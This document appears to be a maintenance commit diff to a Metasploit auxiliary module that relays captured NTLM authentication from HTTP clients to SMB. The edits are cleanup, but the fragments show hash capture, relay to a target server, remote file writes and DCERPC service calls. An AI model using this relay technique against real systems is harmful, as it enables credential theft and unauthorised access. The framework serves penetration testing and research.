Clean up tabs, warnings, modified datastore
James Lee
parent
c9cebfb3f0
commit
8b8422172f
|
|
@ -91,7 +91,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
when 'OPTIONS'
|
when 'OPTIONS'
|
||||||
process_options(cli, request)
|
process_options(cli, request)
|
||||||
else
|
else
|
||||||
datastore['REQUEST_IP'] = cli.peerhost
|
|
||||||
cli.keepalive = true;
|
cli.keepalive = true;
|
||||||
|
|
||||||
# If the host has not started auth, send 401 authenticate with only the NTLM option
|
# If the host has not started auth, send 401 authenticate with only the NTLM option
|
||||||
|
|
@ -237,10 +236,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
print_error("PUTDATA and FILEPUTDATA cannot both contain data")
|
print_error("PUTDATA and FILEPUTDATA cannot both contain data")
|
||||||
raise ArgumentError
|
raise ArgumentError
|
||||||
elsif datastore['PUTDATA'] != nil
|
elsif datastore['PUTDATA'] != nil
|
||||||
datastore['FINALPUTDATA'] = datastore['PUTDATA']
|
@finalputdata = datastore['PUTDATA']
|
||||||
elsif datastore['FILEPUTDATA'] != nil
|
elsif datastore['FILEPUTDATA'] != nil
|
||||||
f = File.open(datastore['FILEPUTDATA'], "rb")
|
f = File.open(datastore['FILEPUTDATA'], "rb")
|
||||||
datastore['FINALPUTDATA'] = f.read
|
@finalputdata = f.read
|
||||||
f.close
|
f.close
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
@ -274,7 +273,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
if (method == 'POST')
|
if (method == 'POST')
|
||||||
theaders << 'Content-Length: ' <<
|
theaders << 'Content-Length: ' <<
|
||||||
(datastore['FINALPUTDATA'].length + 4).to_s()<< "\r\n"
|
(@finalputdata.length + 4).to_s()<< "\r\n"
|
||||||
end
|
end
|
||||||
|
|
||||||
# HTTP_HEADERFILE is how this module supports cookies, multipart forms, etc
|
# HTTP_HEADERFILE is how this module supports cookies, multipart forms, etc
|
||||||
|
|
@ -297,10 +296,10 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'method' => method,
|
'method' => method,
|
||||||
'version' => '1.1',
|
'version' => '1.1',
|
||||||
}
|
}
|
||||||
if (datastore['FINALPUTDATA'] != nil)
|
if (@finalputdata != nil)
|
||||||
#we need to get rid of an extra "\r\n"
|
#we need to get rid of an extra "\r\n"
|
||||||
theaders = theaders[0..-3]
|
theaders = theaders[0..-3]
|
||||||
opts['data'] = datastore['FINALPUTDATA'] << "\r\n\r\n"
|
opts['data'] = @finalputdata << "\r\n\r\n"
|
||||||
end
|
end
|
||||||
opts['SSL'] = true if datastore["RSSL"]
|
opts['SSL'] = true if datastore["RSSL"]
|
||||||
opts['raw_headers'] = theaders
|
opts['raw_headers'] = theaders
|
||||||
|
|
@ -326,12 +325,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
#relay ntlm type1 message for SMB
|
#relay ntlm type1 message for SMB
|
||||||
def smb_relay_toservert1(hash)
|
def smb_relay_toservert1(hash)
|
||||||
rsock = Rex::Socket::Tcp.create(
|
rsock = Rex::Socket::Tcp.create(
|
||||||
'PeerHost' => datastore['RHOST'],
|
'PeerHost' => datastore['RHOST'],
|
||||||
'PeerPort' => datastore['RPORT'],
|
'PeerPort' => datastore['RPORT'],
|
||||||
'Timeout' => 3,
|
'Timeout' => 3,
|
||||||
'Context' =>
|
'Context' =>
|
||||||
{
|
{
|
||||||
'Msf' => framework,
|
'Msf' => framework,
|
||||||
'MsfExploit'=> self,
|
'MsfExploit'=> self,
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
|
@ -356,7 +355,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
begin
|
begin
|
||||||
#lazy ntlmsspblob extraction
|
#lazy ntlmsspblob extraction
|
||||||
ntlmsspblob = 'NTLMSSP' <<
|
ntlmsspblob = 'NTLMSSP' <<
|
||||||
(resp.to_s().split('NTLMSSP')[1].split("\x00\x00Win")[0]) <<
|
(resp.to_s().split('NTLMSSP')[1].split("\x00\x00Win")[0]) <<
|
||||||
"\x00\x00"
|
"\x00\x00"
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
|
|
@ -369,7 +368,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
#relay ntlm type3 SMB message
|
#relay ntlm type3 SMB message
|
||||||
def smb_relay_toservert3(hash, ser_sock)
|
def smb_relay_toservert3(hash, ser_sock)
|
||||||
arg = get_hash_info(hash)
|
#arg = get_hash_info(hash)
|
||||||
dhash = Rex::Text.decode_base64(hash)
|
dhash = Rex::Text.decode_base64(hash)
|
||||||
|
|
||||||
#Create a GSS blob for ntlmssp type 3 message, encoding the passed hash
|
#Create a GSS blob for ntlmssp type 3 message, encoding the passed hash
|
||||||
|
|
@ -426,7 +425,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
ser_sock.client.tree_connect(share)
|
ser_sock.client.tree_connect(share)
|
||||||
|
|
||||||
fd = ser_sock.open("\\#{path}", 'rwct')
|
fd = ser_sock.open("\\#{path}", 'rwct')
|
||||||
fd << datastore['FINALPUTDATA']
|
fd << @finalputdata
|
||||||
fd.close
|
fd.close
|
||||||
|
|
||||||
logdata = "File \\\\#{datastore['RHOST']}\\#{datastore['RURIPATH']} written"
|
logdata = "File \\\\#{datastore['RHOST']}\\#{datastore['RURIPATH']} written"
|
||||||
|
|
@ -538,7 +537,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
response = dcerpc.call(0x0c, stubdata)
|
response = dcerpc.call(0x0c, stubdata)
|
||||||
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
|
||||||
svc_handle = dcerpc.last_response.stub_data[0,20]
|
svc_handle = dcerpc.last_response.stub_data[0,20]
|
||||||
svc_status = dcerpc.last_response.stub_data[24,4]
|
#svc_status = dcerpc.last_response.stub_data[24,4]
|
||||||
end
|
end
|
||||||
rescue ::Exception => e
|
rescue ::Exception => e
|
||||||
print_error("Error: #{e}")
|
print_error("Error: #{e}")
|
||||||
|
|
@ -629,7 +628,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
nt_len = ntlm_hash.length
|
nt_len = ntlm_hash.length
|
||||||
|
|
||||||
if nt_len == 48 #lmv1/ntlmv1 or ntlm2_session
|
if nt_len == 48 #lmv1/ntlmv1 or ntlm2_session
|
||||||
arg = { :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
|
arg = { :ntlm_ver => NTLM_CONST::NTLM_V1_RESPONSE,
|
||||||
:lm_hash => lm_hash,
|
:lm_hash => lm_hash,
|
||||||
:nt_hash => ntlm_hash
|
:nt_hash => ntlm_hash
|
||||||
}
|
}
|
||||||
|
|
@ -640,11 +639,11 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
#if the length of the ntlm response is not 24 then it will be bigger and represent
|
#if the length of the ntlm response is not 24 then it will be bigger and represent
|
||||||
#a ntlmv2 response
|
#a ntlmv2 response
|
||||||
elsif nt_len > 48 #lmv2/ntlmv2
|
elsif nt_len > 48 #lmv2/ntlmv2
|
||||||
arg = { :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
|
arg = { :ntlm_ver => NTLM_CONST::NTLM_V2_RESPONSE,
|
||||||
:lm_hash => lm_hash[0, 32],
|
:lm_hash => lm_hash[0, 32],
|
||||||
:lm_cli_challenge => lm_hash[32, 16],
|
:lm_cli_challenge => lm_hash[32, 16],
|
||||||
:nt_hash => ntlm_hash[0, 32],
|
:nt_hash => ntlm_hash[0, 32],
|
||||||
:nt_cli_challenge => ntlm_hash[32, nt_len - 32]
|
:nt_cli_challenge => ntlm_hash[32, nt_len - 32]
|
||||||
}
|
}
|
||||||
elsif nt_len == 0
|
elsif nt_len == 0
|
||||||
print_status("Empty hash from #{host} captured, ignoring ... ")
|
print_status("Empty hash from #{host} captured, ignoring ... ")
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue